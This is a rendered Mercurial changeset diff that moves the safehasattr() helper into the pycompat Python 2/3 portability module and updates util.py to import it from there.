##// END OF EJS Templates
util: make safehasattr() a pycompat function...
Yuya Nishihara -
r37117:6ca5f825 default
parent child Browse files
Show More
@@ -1,373 +1,380
1 # pycompat.py - portability shim for python 3
1 # pycompat.py - portability shim for python 3
2 #
2 #
3 # This software may be used and distributed according to the terms of the
3 # This software may be used and distributed according to the terms of the
4 # GNU General Public License version 2 or any later version.
4 # GNU General Public License version 2 or any later version.
5
5
6 """Mercurial portability shim for python 3.
6 """Mercurial portability shim for python 3.
7
7
8 This contains aliases to hide python version-specific details from the core.
8 This contains aliases to hide python version-specific details from the core.
9 """
9 """
10
10
11 from __future__ import absolute_import
11 from __future__ import absolute_import
12
12
13 import getopt
13 import getopt
14 import inspect
14 import inspect
15 import os
15 import os
16 import shlex
16 import shlex
17 import sys
17 import sys
18
18
19 ispy3 = (sys.version_info[0] >= 3)
19 ispy3 = (sys.version_info[0] >= 3)
20 ispypy = (r'__pypy__' in sys.builtin_module_names)
20 ispypy = (r'__pypy__' in sys.builtin_module_names)
21
21
22 if not ispy3:
22 if not ispy3:
23 import cookielib
23 import cookielib
24 import cPickle as pickle
24 import cPickle as pickle
25 import httplib
25 import httplib
26 import Queue as _queue
26 import Queue as _queue
27 import SocketServer as socketserver
27 import SocketServer as socketserver
28 import xmlrpclib
28 import xmlrpclib
29 else:
29 else:
30 import http.cookiejar as cookielib
30 import http.cookiejar as cookielib
31 import http.client as httplib
31 import http.client as httplib
32 import pickle
32 import pickle
33 import queue as _queue
33 import queue as _queue
34 import socketserver
34 import socketserver
35 import xmlrpc.client as xmlrpclib
35 import xmlrpc.client as xmlrpclib
36
36
37 empty = _queue.Empty
37 empty = _queue.Empty
38 queue = _queue.Queue
38 queue = _queue.Queue
39
39
40 def identity(a):
40 def identity(a):
41 return a
41 return a
42
42
43 if ispy3:
43 if ispy3:
44 import builtins
44 import builtins
45 import functools
45 import functools
46 import io
46 import io
47 import struct
47 import struct
48
48
49 fsencode = os.fsencode
49 fsencode = os.fsencode
50 fsdecode = os.fsdecode
50 fsdecode = os.fsdecode
51 oscurdir = os.curdir.encode('ascii')
51 oscurdir = os.curdir.encode('ascii')
52 oslinesep = os.linesep.encode('ascii')
52 oslinesep = os.linesep.encode('ascii')
53 osname = os.name.encode('ascii')
53 osname = os.name.encode('ascii')
54 ospathsep = os.pathsep.encode('ascii')
54 ospathsep = os.pathsep.encode('ascii')
55 ospardir = os.pardir.encode('ascii')
55 ospardir = os.pardir.encode('ascii')
56 ossep = os.sep.encode('ascii')
56 ossep = os.sep.encode('ascii')
57 osaltsep = os.altsep
57 osaltsep = os.altsep
58 if osaltsep:
58 if osaltsep:
59 osaltsep = osaltsep.encode('ascii')
59 osaltsep = osaltsep.encode('ascii')
60 # os.getcwd() on Python 3 returns string, but it has os.getcwdb() which
60 # os.getcwd() on Python 3 returns string, but it has os.getcwdb() which
61 # returns bytes.
61 # returns bytes.
62 getcwd = os.getcwdb
62 getcwd = os.getcwdb
63 sysplatform = sys.platform.encode('ascii')
63 sysplatform = sys.platform.encode('ascii')
64 sysexecutable = sys.executable
64 sysexecutable = sys.executable
65 if sysexecutable:
65 if sysexecutable:
66 sysexecutable = os.fsencode(sysexecutable)
66 sysexecutable = os.fsencode(sysexecutable)
67 bytesio = io.BytesIO
67 bytesio = io.BytesIO
68 # TODO deprecate stringio name, as it is a lie on Python 3.
68 # TODO deprecate stringio name, as it is a lie on Python 3.
69 stringio = bytesio
69 stringio = bytesio
70
70
71 def maplist(*args):
71 def maplist(*args):
72 return list(map(*args))
72 return list(map(*args))
73
73
74 def rangelist(*args):
74 def rangelist(*args):
75 return list(range(*args))
75 return list(range(*args))
76
76
77 def ziplist(*args):
77 def ziplist(*args):
78 return list(zip(*args))
78 return list(zip(*args))
79
79
80 rawinput = input
80 rawinput = input
81 getargspec = inspect.getfullargspec
81 getargspec = inspect.getfullargspec
82
82
83 # TODO: .buffer might not exist if std streams were replaced; we'll need
83 # TODO: .buffer might not exist if std streams were replaced; we'll need
84 # a silly wrapper to make a bytes stream backed by a unicode one.
84 # a silly wrapper to make a bytes stream backed by a unicode one.
85 stdin = sys.stdin.buffer
85 stdin = sys.stdin.buffer
86 stdout = sys.stdout.buffer
86 stdout = sys.stdout.buffer
87 stderr = sys.stderr.buffer
87 stderr = sys.stderr.buffer
88
88
89 # Since Python 3 converts argv to wchar_t type by Py_DecodeLocale() on Unix,
89 # Since Python 3 converts argv to wchar_t type by Py_DecodeLocale() on Unix,
90 # we can use os.fsencode() to get back bytes argv.
90 # we can use os.fsencode() to get back bytes argv.
91 #
91 #
92 # https://hg.python.org/cpython/file/v3.5.1/Programs/python.c#l55
92 # https://hg.python.org/cpython/file/v3.5.1/Programs/python.c#l55
93 #
93 #
94 # TODO: On Windows, the native argv is wchar_t, so we'll need a different
94 # TODO: On Windows, the native argv is wchar_t, so we'll need a different
95 # workaround to simulate the Python 2 (i.e. ANSI Win32 API) behavior.
95 # workaround to simulate the Python 2 (i.e. ANSI Win32 API) behavior.
96 if getattr(sys, 'argv', None) is not None:
96 if getattr(sys, 'argv', None) is not None:
97 sysargv = list(map(os.fsencode, sys.argv))
97 sysargv = list(map(os.fsencode, sys.argv))
98
98
99 bytechr = struct.Struct('>B').pack
99 bytechr = struct.Struct('>B').pack
100 byterepr = b'%r'.__mod__
100 byterepr = b'%r'.__mod__
101
101
102 class bytestr(bytes):
102 class bytestr(bytes):
103 """A bytes which mostly acts as a Python 2 str
103 """A bytes which mostly acts as a Python 2 str
104
104
105 >>> bytestr(), bytestr(bytearray(b'foo')), bytestr(u'ascii'), bytestr(1)
105 >>> bytestr(), bytestr(bytearray(b'foo')), bytestr(u'ascii'), bytestr(1)
106 ('', 'foo', 'ascii', '1')
106 ('', 'foo', 'ascii', '1')
107 >>> s = bytestr(b'foo')
107 >>> s = bytestr(b'foo')
108 >>> assert s is bytestr(s)
108 >>> assert s is bytestr(s)
109
109
110 __bytes__() should be called if provided:
110 __bytes__() should be called if provided:
111
111
112 >>> class bytesable(object):
112 >>> class bytesable(object):
113 ... def __bytes__(self):
113 ... def __bytes__(self):
114 ... return b'bytes'
114 ... return b'bytes'
115 >>> bytestr(bytesable())
115 >>> bytestr(bytesable())
116 'bytes'
116 'bytes'
117
117
118 There's no implicit conversion from non-ascii str as its encoding is
118 There's no implicit conversion from non-ascii str as its encoding is
119 unknown:
119 unknown:
120
120
121 >>> bytestr(chr(0x80)) # doctest: +ELLIPSIS
121 >>> bytestr(chr(0x80)) # doctest: +ELLIPSIS
122 Traceback (most recent call last):
122 Traceback (most recent call last):
123 ...
123 ...
124 UnicodeEncodeError: ...
124 UnicodeEncodeError: ...
125
125
126 Comparison between bytestr and bytes should work:
126 Comparison between bytestr and bytes should work:
127
127
128 >>> assert bytestr(b'foo') == b'foo'
128 >>> assert bytestr(b'foo') == b'foo'
129 >>> assert b'foo' == bytestr(b'foo')
129 >>> assert b'foo' == bytestr(b'foo')
130 >>> assert b'f' in bytestr(b'foo')
130 >>> assert b'f' in bytestr(b'foo')
131 >>> assert bytestr(b'f') in b'foo'
131 >>> assert bytestr(b'f') in b'foo'
132
132
133 Sliced elements should be bytes, not integer:
133 Sliced elements should be bytes, not integer:
134
134
135 >>> s[1], s[:2]
135 >>> s[1], s[:2]
136 (b'o', b'fo')
136 (b'o', b'fo')
137 >>> list(s), list(reversed(s))
137 >>> list(s), list(reversed(s))
138 ([b'f', b'o', b'o'], [b'o', b'o', b'f'])
138 ([b'f', b'o', b'o'], [b'o', b'o', b'f'])
139
139
140 As bytestr type isn't propagated across operations, you need to cast
140 As bytestr type isn't propagated across operations, you need to cast
141 bytes to bytestr explicitly:
141 bytes to bytestr explicitly:
142
142
143 >>> s = bytestr(b'foo').upper()
143 >>> s = bytestr(b'foo').upper()
144 >>> t = bytestr(s)
144 >>> t = bytestr(s)
145 >>> s[0], t[0]
145 >>> s[0], t[0]
146 (70, b'F')
146 (70, b'F')
147
147
148 Be careful to not pass a bytestr object to a function which expects
148 Be careful to not pass a bytestr object to a function which expects
149 bytearray-like behavior.
149 bytearray-like behavior.
150
150
151 >>> t = bytes(t) # cast to bytes
151 >>> t = bytes(t) # cast to bytes
152 >>> assert type(t) is bytes
152 >>> assert type(t) is bytes
153 """
153 """
154
154
155 def __new__(cls, s=b''):
155 def __new__(cls, s=b''):
156 if isinstance(s, bytestr):
156 if isinstance(s, bytestr):
157 return s
157 return s
158 if (not isinstance(s, (bytes, bytearray))
158 if (not isinstance(s, (bytes, bytearray))
159 and not hasattr(s, u'__bytes__')): # hasattr-py3-only
159 and not hasattr(s, u'__bytes__')): # hasattr-py3-only
160 s = str(s).encode(u'ascii')
160 s = str(s).encode(u'ascii')
161 return bytes.__new__(cls, s)
161 return bytes.__new__(cls, s)
162
162
163 def __getitem__(self, key):
163 def __getitem__(self, key):
164 s = bytes.__getitem__(self, key)
164 s = bytes.__getitem__(self, key)
165 if not isinstance(s, bytes):
165 if not isinstance(s, bytes):
166 s = bytechr(s)
166 s = bytechr(s)
167 return s
167 return s
168
168
169 def __iter__(self):
169 def __iter__(self):
170 return iterbytestr(bytes.__iter__(self))
170 return iterbytestr(bytes.__iter__(self))
171
171
172 def __repr__(self):
172 def __repr__(self):
173 return bytes.__repr__(self)[1:] # drop b''
173 return bytes.__repr__(self)[1:] # drop b''
174
174
175 def iterbytestr(s):
175 def iterbytestr(s):
176 """Iterate bytes as if it were a str object of Python 2"""
176 """Iterate bytes as if it were a str object of Python 2"""
177 return map(bytechr, s)
177 return map(bytechr, s)
178
178
179 def maybebytestr(s):
179 def maybebytestr(s):
180 """Promote bytes to bytestr"""
180 """Promote bytes to bytestr"""
181 if isinstance(s, bytes):
181 if isinstance(s, bytes):
182 return bytestr(s)
182 return bytestr(s)
183 return s
183 return s
184
184
185 def sysbytes(s):
185 def sysbytes(s):
186 """Convert an internal str (e.g. keyword, __doc__) back to bytes
186 """Convert an internal str (e.g. keyword, __doc__) back to bytes
187
187
188 This never raises UnicodeEncodeError, but only ASCII characters
188 This never raises UnicodeEncodeError, but only ASCII characters
189 can be round-trip by sysstr(sysbytes(s)).
189 can be round-trip by sysstr(sysbytes(s)).
190 """
190 """
191 return s.encode(u'utf-8')
191 return s.encode(u'utf-8')
192
192
193 def sysstr(s):
193 def sysstr(s):
194 """Return a keyword str to be passed to Python functions such as
194 """Return a keyword str to be passed to Python functions such as
195 getattr() and str.encode()
195 getattr() and str.encode()
196
196
197 This never raises UnicodeDecodeError. Non-ascii characters are
197 This never raises UnicodeDecodeError. Non-ascii characters are
198 considered invalid and mapped to arbitrary but unique code points
198 considered invalid and mapped to arbitrary but unique code points
199 such that 'sysstr(a) != sysstr(b)' for all 'a != b'.
199 such that 'sysstr(a) != sysstr(b)' for all 'a != b'.
200 """
200 """
201 if isinstance(s, builtins.str):
201 if isinstance(s, builtins.str):
202 return s
202 return s
203 return s.decode(u'latin-1')
203 return s.decode(u'latin-1')
204
204
205 def strurl(url):
205 def strurl(url):
206 """Converts a bytes url back to str"""
206 """Converts a bytes url back to str"""
207 if isinstance(url, bytes):
207 if isinstance(url, bytes):
208 return url.decode(u'ascii')
208 return url.decode(u'ascii')
209 return url
209 return url
210
210
211 def bytesurl(url):
211 def bytesurl(url):
212 """Converts a str url to bytes by encoding in ascii"""
212 """Converts a str url to bytes by encoding in ascii"""
213 if isinstance(url, str):
213 if isinstance(url, str):
214 return url.encode(u'ascii')
214 return url.encode(u'ascii')
215 return url
215 return url
216
216
217 def raisewithtb(exc, tb):
217 def raisewithtb(exc, tb):
218 """Raise exception with the given traceback"""
218 """Raise exception with the given traceback"""
219 raise exc.with_traceback(tb)
219 raise exc.with_traceback(tb)
220
220
221 def getdoc(obj):
221 def getdoc(obj):
222 """Get docstring as bytes; may be None so gettext() won't confuse it
222 """Get docstring as bytes; may be None so gettext() won't confuse it
223 with _('')"""
223 with _('')"""
224 doc = getattr(obj, u'__doc__', None)
224 doc = getattr(obj, u'__doc__', None)
225 if doc is None:
225 if doc is None:
226 return doc
226 return doc
227 return sysbytes(doc)
227 return sysbytes(doc)
228
228
229 def _wrapattrfunc(f):
229 def _wrapattrfunc(f):
230 @functools.wraps(f)
230 @functools.wraps(f)
231 def w(object, name, *args):
231 def w(object, name, *args):
232 return f(object, sysstr(name), *args)
232 return f(object, sysstr(name), *args)
233 return w
233 return w
234
234
235 # these wrappers are automagically imported by hgloader
235 # these wrappers are automagically imported by hgloader
236 delattr = _wrapattrfunc(builtins.delattr)
236 delattr = _wrapattrfunc(builtins.delattr)
237 getattr = _wrapattrfunc(builtins.getattr)
237 getattr = _wrapattrfunc(builtins.getattr)
238 hasattr = _wrapattrfunc(builtins.hasattr)
238 hasattr = _wrapattrfunc(builtins.hasattr)
239 setattr = _wrapattrfunc(builtins.setattr)
239 setattr = _wrapattrfunc(builtins.setattr)
240 xrange = builtins.range
240 xrange = builtins.range
241 unicode = str
241 unicode = str
242
242
243 def open(name, mode='r', buffering=-1, encoding=None):
243 def open(name, mode='r', buffering=-1, encoding=None):
244 return builtins.open(name, sysstr(mode), buffering, encoding)
244 return builtins.open(name, sysstr(mode), buffering, encoding)
245
245
246 safehasattr = _wrapattrfunc(builtins.hasattr)
247
246 def _getoptbwrapper(orig, args, shortlist, namelist):
248 def _getoptbwrapper(orig, args, shortlist, namelist):
247 """
249 """
248 Takes bytes arguments, converts them to unicode, pass them to
250 Takes bytes arguments, converts them to unicode, pass them to
249 getopt.getopt(), convert the returned values back to bytes and then
251 getopt.getopt(), convert the returned values back to bytes and then
250 return them for Python 3 compatibility as getopt.getopt() don't accepts
252 return them for Python 3 compatibility as getopt.getopt() don't accepts
251 bytes on Python 3.
253 bytes on Python 3.
252 """
254 """
253 args = [a.decode('latin-1') for a in args]
255 args = [a.decode('latin-1') for a in args]
254 shortlist = shortlist.decode('latin-1')
256 shortlist = shortlist.decode('latin-1')
255 namelist = [a.decode('latin-1') for a in namelist]
257 namelist = [a.decode('latin-1') for a in namelist]
256 opts, args = orig(args, shortlist, namelist)
258 opts, args = orig(args, shortlist, namelist)
257 opts = [(a[0].encode('latin-1'), a[1].encode('latin-1'))
259 opts = [(a[0].encode('latin-1'), a[1].encode('latin-1'))
258 for a in opts]
260 for a in opts]
259 args = [a.encode('latin-1') for a in args]
261 args = [a.encode('latin-1') for a in args]
260 return opts, args
262 return opts, args
261
263
262 def strkwargs(dic):
264 def strkwargs(dic):
263 """
265 """
264 Converts the keys of a python dictonary to str i.e. unicodes so that
266 Converts the keys of a python dictonary to str i.e. unicodes so that
265 they can be passed as keyword arguments as dictonaries with bytes keys
267 they can be passed as keyword arguments as dictonaries with bytes keys
266 can't be passed as keyword arguments to functions on Python 3.
268 can't be passed as keyword arguments to functions on Python 3.
267 """
269 """
268 dic = dict((k.decode('latin-1'), v) for k, v in dic.iteritems())
270 dic = dict((k.decode('latin-1'), v) for k, v in dic.iteritems())
269 return dic
271 return dic
270
272
271 def byteskwargs(dic):
273 def byteskwargs(dic):
272 """
274 """
273 Converts keys of python dictonaries to bytes as they were converted to
275 Converts keys of python dictonaries to bytes as they were converted to
274 str to pass that dictonary as a keyword argument on Python 3.
276 str to pass that dictonary as a keyword argument on Python 3.
275 """
277 """
276 dic = dict((k.encode('latin-1'), v) for k, v in dic.iteritems())
278 dic = dict((k.encode('latin-1'), v) for k, v in dic.iteritems())
277 return dic
279 return dic
278
280
279 # TODO: handle shlex.shlex().
281 # TODO: handle shlex.shlex().
280 def shlexsplit(s, comments=False, posix=True):
282 def shlexsplit(s, comments=False, posix=True):
281 """
283 """
282 Takes bytes argument, convert it to str i.e. unicodes, pass that into
284 Takes bytes argument, convert it to str i.e. unicodes, pass that into
283 shlex.split(), convert the returned value to bytes and return that for
285 shlex.split(), convert the returned value to bytes and return that for
284 Python 3 compatibility as shelx.split() don't accept bytes on Python 3.
286 Python 3 compatibility as shelx.split() don't accept bytes on Python 3.
285 """
287 """
286 ret = shlex.split(s.decode('latin-1'), comments, posix)
288 ret = shlex.split(s.decode('latin-1'), comments, posix)
287 return [a.encode('latin-1') for a in ret]
289 return [a.encode('latin-1') for a in ret]
288
290
289 def emailparser(*args, **kwargs):
291 def emailparser(*args, **kwargs):
290 import email.parser
292 import email.parser
291 return email.parser.BytesParser(*args, **kwargs)
293 return email.parser.BytesParser(*args, **kwargs)
292
294
293 else:
295 else:
294 import cStringIO
296 import cStringIO
295
297
296 bytechr = chr
298 bytechr = chr
297 byterepr = repr
299 byterepr = repr
298 bytestr = str
300 bytestr = str
299 iterbytestr = iter
301 iterbytestr = iter
300 maybebytestr = identity
302 maybebytestr = identity
301 sysbytes = identity
303 sysbytes = identity
302 sysstr = identity
304 sysstr = identity
303 strurl = identity
305 strurl = identity
304 bytesurl = identity
306 bytesurl = identity
305
307
306 # this can't be parsed on Python 3
308 # this can't be parsed on Python 3
307 exec('def raisewithtb(exc, tb):\n'
309 exec('def raisewithtb(exc, tb):\n'
308 ' raise exc, None, tb\n')
310 ' raise exc, None, tb\n')
309
311
310 def fsencode(filename):
312 def fsencode(filename):
311 """
313 """
312 Partial backport from os.py in Python 3, which only accepts bytes.
314 Partial backport from os.py in Python 3, which only accepts bytes.
313 In Python 2, our paths should only ever be bytes, a unicode path
315 In Python 2, our paths should only ever be bytes, a unicode path
314 indicates a bug.
316 indicates a bug.
315 """
317 """
316 if isinstance(filename, str):
318 if isinstance(filename, str):
317 return filename
319 return filename
318 else:
320 else:
319 raise TypeError(
321 raise TypeError(
320 "expect str, not %s" % type(filename).__name__)
322 "expect str, not %s" % type(filename).__name__)
321
323
322 # In Python 2, fsdecode() has a very chance to receive bytes. So it's
324 # In Python 2, fsdecode() has a very chance to receive bytes. So it's
323 # better not to touch Python 2 part as it's already working fine.
325 # better not to touch Python 2 part as it's already working fine.
324 fsdecode = identity
326 fsdecode = identity
325
327
326 def getdoc(obj):
328 def getdoc(obj):
327 return getattr(obj, '__doc__', None)
329 return getattr(obj, '__doc__', None)
328
330
331 _notset = object()
332
333 def safehasattr(thing, attr):
334 return getattr(thing, attr, _notset) is not _notset
335
329 def _getoptbwrapper(orig, args, shortlist, namelist):
336 def _getoptbwrapper(orig, args, shortlist, namelist):
330 return orig(args, shortlist, namelist)
337 return orig(args, shortlist, namelist)
331
338
332 strkwargs = identity
339 strkwargs = identity
333 byteskwargs = identity
340 byteskwargs = identity
334
341
335 oscurdir = os.curdir
342 oscurdir = os.curdir
336 oslinesep = os.linesep
343 oslinesep = os.linesep
337 osname = os.name
344 osname = os.name
338 ospathsep = os.pathsep
345 ospathsep = os.pathsep
339 ospardir = os.pardir
346 ospardir = os.pardir
340 ossep = os.sep
347 ossep = os.sep
341 osaltsep = os.altsep
348 osaltsep = os.altsep
342 stdin = sys.stdin
349 stdin = sys.stdin
343 stdout = sys.stdout
350 stdout = sys.stdout
344 stderr = sys.stderr
351 stderr = sys.stderr
345 if getattr(sys, 'argv', None) is not None:
352 if getattr(sys, 'argv', None) is not None:
346 sysargv = sys.argv
353 sysargv = sys.argv
347 sysplatform = sys.platform
354 sysplatform = sys.platform
348 getcwd = os.getcwd
355 getcwd = os.getcwd
349 sysexecutable = sys.executable
356 sysexecutable = sys.executable
350 shlexsplit = shlex.split
357 shlexsplit = shlex.split
351 bytesio = cStringIO.StringIO
358 bytesio = cStringIO.StringIO
352 stringio = bytesio
359 stringio = bytesio
353 maplist = map
360 maplist = map
354 rangelist = range
361 rangelist = range
355 ziplist = zip
362 ziplist = zip
356 rawinput = raw_input
363 rawinput = raw_input
357 getargspec = inspect.getargspec
364 getargspec = inspect.getargspec
358
365
359 def emailparser(*args, **kwargs):
366 def emailparser(*args, **kwargs):
360 import email.parser
367 import email.parser
361 return email.parser.Parser(*args, **kwargs)
368 return email.parser.Parser(*args, **kwargs)
362
369
363 isjython = sysplatform.startswith('java')
370 isjython = sysplatform.startswith('java')
364
371
365 isdarwin = sysplatform == 'darwin'
372 isdarwin = sysplatform == 'darwin'
366 isposix = osname == 'posix'
373 isposix = osname == 'posix'
367 iswindows = osname == 'nt'
374 iswindows = osname == 'nt'
368
375
369 def getoptb(args, shortlist, namelist):
376 def getoptb(args, shortlist, namelist):
370 return _getoptbwrapper(getopt.getopt, args, shortlist, namelist)
377 return _getoptbwrapper(getopt.getopt, args, shortlist, namelist)
371
378
372 def gnugetoptb(args, shortlist, namelist):
379 def gnugetoptb(args, shortlist, namelist):
373 return _getoptbwrapper(getopt.gnu_getopt, args, shortlist, namelist)
380 return _getoptbwrapper(getopt.gnu_getopt, args, shortlist, namelist)
@@ -1,4092 +1,4090
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import collections
20 import collections
21 import contextlib
21 import contextlib
22 import errno
22 import errno
23 import gc
23 import gc
24 import hashlib
24 import hashlib
25 import imp
25 import imp
26 import io
26 import io
27 import itertools
27 import itertools
28 import mmap
28 import mmap
29 import os
29 import os
30 import platform as pyplatform
30 import platform as pyplatform
31 import re as remod
31 import re as remod
32 import shutil
32 import shutil
33 import signal
33 import signal
34 import socket
34 import socket
35 import stat
35 import stat
36 import subprocess
36 import subprocess
37 import sys
37 import sys
38 import tempfile
38 import tempfile
39 import time
39 import time
40 import traceback
40 import traceback
41 import warnings
41 import warnings
42 import zlib
42 import zlib
43
43
44 from . import (
44 from . import (
45 encoding,
45 encoding,
46 error,
46 error,
47 i18n,
47 i18n,
48 node as nodemod,
48 node as nodemod,
49 policy,
49 policy,
50 pycompat,
50 pycompat,
51 urllibcompat,
51 urllibcompat,
52 )
52 )
53 from .utils import (
53 from .utils import (
54 dateutil,
54 dateutil,
55 stringutil,
55 stringutil,
56 )
56 )
57
57
58 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
61
61
62 b85decode = base85.b85decode
62 b85decode = base85.b85decode
63 b85encode = base85.b85encode
63 b85encode = base85.b85encode
64
64
65 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
66 empty = pycompat.empty
66 empty = pycompat.empty
67 httplib = pycompat.httplib
67 httplib = pycompat.httplib
68 pickle = pycompat.pickle
68 pickle = pycompat.pickle
69 queue = pycompat.queue
69 queue = pycompat.queue
70 safehasattr = pycompat.safehasattr
70 socketserver = pycompat.socketserver
71 socketserver = pycompat.socketserver
71 stderr = pycompat.stderr
72 stderr = pycompat.stderr
72 stdin = pycompat.stdin
73 stdin = pycompat.stdin
73 stdout = pycompat.stdout
74 stdout = pycompat.stdout
74 bytesio = pycompat.bytesio
75 bytesio = pycompat.bytesio
75 # TODO deprecate stringio name, as it is a lie on Python 3.
76 # TODO deprecate stringio name, as it is a lie on Python 3.
76 stringio = bytesio
77 stringio = bytesio
77 xmlrpclib = pycompat.xmlrpclib
78 xmlrpclib = pycompat.xmlrpclib
78
79
79 httpserver = urllibcompat.httpserver
80 httpserver = urllibcompat.httpserver
80 urlerr = urllibcompat.urlerr
81 urlerr = urllibcompat.urlerr
81 urlreq = urllibcompat.urlreq
82 urlreq = urllibcompat.urlreq
82
83
83 # workaround for win32mbcs
84 # workaround for win32mbcs
84 _filenamebytestr = pycompat.bytestr
85 _filenamebytestr = pycompat.bytestr
85
86
86 def isatty(fp):
87 def isatty(fp):
87 try:
88 try:
88 return fp.isatty()
89 return fp.isatty()
89 except AttributeError:
90 except AttributeError:
90 return False
91 return False
91
92
92 # glibc determines buffering on first write to stdout - if we replace a TTY
93 # glibc determines buffering on first write to stdout - if we replace a TTY
93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
94 # destined stdout with a pipe destined stdout (e.g. pager), we want line
94 # buffering
95 # buffering
95 if isatty(stdout):
96 if isatty(stdout):
96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
97 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
97
98
98 if pycompat.iswindows:
99 if pycompat.iswindows:
99 from . import windows as platform
100 from . import windows as platform
100 stdout = platform.winstdout(stdout)
101 stdout = platform.winstdout(stdout)
101 else:
102 else:
102 from . import posix as platform
103 from . import posix as platform
103
104
104 _ = i18n._
105 _ = i18n._
105
106
106 bindunixsocket = platform.bindunixsocket
107 bindunixsocket = platform.bindunixsocket
107 cachestat = platform.cachestat
108 cachestat = platform.cachestat
108 checkexec = platform.checkexec
109 checkexec = platform.checkexec
109 checklink = platform.checklink
110 checklink = platform.checklink
110 copymode = platform.copymode
111 copymode = platform.copymode
111 expandglobs = platform.expandglobs
112 expandglobs = platform.expandglobs
112 explainexit = platform.explainexit
113 explainexit = platform.explainexit
113 findexe = platform.findexe
114 findexe = platform.findexe
114 getfsmountpoint = platform.getfsmountpoint
115 getfsmountpoint = platform.getfsmountpoint
115 getfstype = platform.getfstype
116 getfstype = platform.getfstype
116 gethgcmd = platform.gethgcmd
117 gethgcmd = platform.gethgcmd
117 getuser = platform.getuser
118 getuser = platform.getuser
118 getpid = os.getpid
119 getpid = os.getpid
119 groupmembers = platform.groupmembers
120 groupmembers = platform.groupmembers
120 groupname = platform.groupname
121 groupname = platform.groupname
121 hidewindow = platform.hidewindow
122 hidewindow = platform.hidewindow
122 isexec = platform.isexec
123 isexec = platform.isexec
123 isowner = platform.isowner
124 isowner = platform.isowner
124 listdir = osutil.listdir
125 listdir = osutil.listdir
125 localpath = platform.localpath
126 localpath = platform.localpath
126 lookupreg = platform.lookupreg
127 lookupreg = platform.lookupreg
127 makedir = platform.makedir
128 makedir = platform.makedir
128 nlinks = platform.nlinks
129 nlinks = platform.nlinks
129 normpath = platform.normpath
130 normpath = platform.normpath
130 normcase = platform.normcase
131 normcase = platform.normcase
131 normcasespec = platform.normcasespec
132 normcasespec = platform.normcasespec
132 normcasefallback = platform.normcasefallback
133 normcasefallback = platform.normcasefallback
133 openhardlinks = platform.openhardlinks
134 openhardlinks = platform.openhardlinks
134 oslink = platform.oslink
135 oslink = platform.oslink
135 parsepatchoutput = platform.parsepatchoutput
136 parsepatchoutput = platform.parsepatchoutput
136 pconvert = platform.pconvert
137 pconvert = platform.pconvert
137 poll = platform.poll
138 poll = platform.poll
138 popen = platform.popen
139 popen = platform.popen
139 posixfile = platform.posixfile
140 posixfile = platform.posixfile
140 quotecommand = platform.quotecommand
141 quotecommand = platform.quotecommand
141 readpipe = platform.readpipe
142 readpipe = platform.readpipe
142 rename = platform.rename
143 rename = platform.rename
143 removedirs = platform.removedirs
144 removedirs = platform.removedirs
144 samedevice = platform.samedevice
145 samedevice = platform.samedevice
145 samefile = platform.samefile
146 samefile = platform.samefile
146 samestat = platform.samestat
147 samestat = platform.samestat
147 setbinary = platform.setbinary
148 setbinary = platform.setbinary
148 setflags = platform.setflags
149 setflags = platform.setflags
149 setsignalhandler = platform.setsignalhandler
150 setsignalhandler = platform.setsignalhandler
150 shellquote = platform.shellquote
151 shellquote = platform.shellquote
151 shellsplit = platform.shellsplit
152 shellsplit = platform.shellsplit
152 spawndetached = platform.spawndetached
153 spawndetached = platform.spawndetached
153 split = platform.split
154 split = platform.split
154 sshargs = platform.sshargs
155 sshargs = platform.sshargs
155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
156 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
156 statisexec = platform.statisexec
157 statisexec = platform.statisexec
157 statislink = platform.statislink
158 statislink = platform.statislink
158 testpid = platform.testpid
159 testpid = platform.testpid
159 umask = platform.umask
160 umask = platform.umask
160 unlink = platform.unlink
161 unlink = platform.unlink
161 username = platform.username
162 username = platform.username
162
163
163 try:
164 try:
164 recvfds = osutil.recvfds
165 recvfds = osutil.recvfds
165 except AttributeError:
166 except AttributeError:
166 pass
167 pass
167 try:
168 try:
168 setprocname = osutil.setprocname
169 setprocname = osutil.setprocname
169 except AttributeError:
170 except AttributeError:
170 pass
171 pass
171 try:
172 try:
172 unblocksignal = osutil.unblocksignal
173 unblocksignal = osutil.unblocksignal
173 except AttributeError:
174 except AttributeError:
174 pass
175 pass
175
176
# Python compatibility

# Sentinel distinguishing "argument not supplied" from an explicit None.
# NOTE: safehasattr() formerly lived here; it is now provided by pycompat
# (see this changeset's description).
_notset = object()
183 def _rapply(f, xs):
181 def _rapply(f, xs):
184 if xs is None:
182 if xs is None:
185 # assume None means non-value of optional data
183 # assume None means non-value of optional data
186 return xs
184 return xs
187 if isinstance(xs, (list, set, tuple)):
185 if isinstance(xs, (list, set, tuple)):
188 return type(xs)(_rapply(f, x) for x in xs)
186 return type(xs)(_rapply(f, x) for x in xs)
189 if isinstance(xs, dict):
187 if isinstance(xs, dict):
190 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
188 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
